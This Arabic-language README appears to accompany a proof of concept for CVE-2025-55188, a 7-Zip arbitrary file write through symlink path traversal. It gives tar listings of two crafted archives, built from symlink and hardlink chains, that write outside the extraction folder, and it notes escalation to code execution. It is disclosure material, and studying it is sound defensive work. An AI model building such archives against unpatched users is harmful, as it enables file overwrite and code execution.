
إثبات المفهوم لـ CVE-2025-55188: كتابة ملفات عشوائية في 7-Zip
إثبات مفهوم لـ CVE-2025-55188، وهي ثغرة كتابة تعسفية للملفات في 7-Zip. تم تصحيحها في الإصدار 25.01، الذي صدر في 3 أغسطس 2025.
ملاحظة: CVE-2025-55188 مختلفة عن CVE-2025-11001.
الإصدار الذي تم فيه تصحيح CVE-2025-11001 (الإصدار 25.00) لا يزال عرضة لتنفيذ كود تعسفي عبر هجمات الروابط الرمزية بسبب CVE-2025-55188.
تم اكتشاف CVE-2025-55188 ونشره قبل نشر CVE-2025-11001.
انظر https://lunbun.dev/blog/cve-2025-55188/ للحصول على شرح وتفاصيل أكثر.
الثغرة بسيطة إلى حدٍ ما.
يتم تنفيذ اجتياز المسار عبر الروابط الرمزية لكتابة الملفات بشكل تعسفي. ومن هناك، يمكن تصعيد الكتابة التعسفية للملفات إلى تنفيذ كود تعسفي عبر الكتابة إلى ملفات حرجة.
اجتياز المسار عبر الروابط الرمزية ممكن بسبب حالة حافة في فحوصات أمان الروابط الرمزية. لقد وجدت طريقتين للقيام بذلك. راجع منشور المدونة لمزيد من التفاصيل.
ملف .tar التالي سيكتب إلى ../a/b/file.txt عند الاستخراج:
$ tar -tvf write.tar
lrw-r--r-- 0/0 0 1969-12-31 16:00 a/link -> ../a/b
hrwxr-xr-x 0/0 0 1969-12-31 16:00 link link to a/link
-rw-r--r-- 0/0 44 1969-12-31 16:00 link/file.txt
يحتوي poc_hardlink على الكود الذي يستخدم طريقة الروابط الصلبة.
ملف .tar التالي سيكتب إلى ../file.txt عند الاستخراج (فقط على لينكس):
$ tar -tvf write.tar
lrw-r--r-- 0/0 0 1969-12-31 16:00 a/b/link -> /a
lrw-r--r-- 0/0 0 1969-12-31 16:00 link -> a/b/link/../../
-rw-r--r-- 0/0 44 1969-12-31 16:00 link/file.txt
يحتوي poc_extraction_root على الكود الذي يستخدم طريقة جذر الاستخراج.